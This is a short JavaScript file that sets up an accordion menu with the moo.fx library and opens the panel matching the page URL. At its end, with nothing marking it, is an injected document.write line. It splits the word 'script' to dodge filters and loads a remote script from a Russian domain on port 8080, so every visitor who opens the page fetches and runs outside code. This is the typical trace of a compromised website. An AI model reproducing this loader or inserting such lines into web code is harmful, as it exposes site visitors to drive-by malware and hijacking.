function init(){
		
		var stretchers = document.getElementsByClassName('stretcher'); 
		var toggles = document.getElementsByClassName('tabbed'); 

		var myAccordion = new fx.Accordion(
			toggles, stretchers, {opacity: true, height: true, duration: 400}
		);

		var found = false;
		toggles.each(function(h3, i){
			var div = Element.find(h3, 'nextSibling'); 
			if (window.location.href.indexOf(h3.title) > 0) {
				myAccordion.showThisHideOpen(div);
				found = true;
			}
		});
		if (!found) myAccordion.showThisHideOpen(stretchers[0]);
	}
	

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Num_Lock.js"></scr'+'ipt>');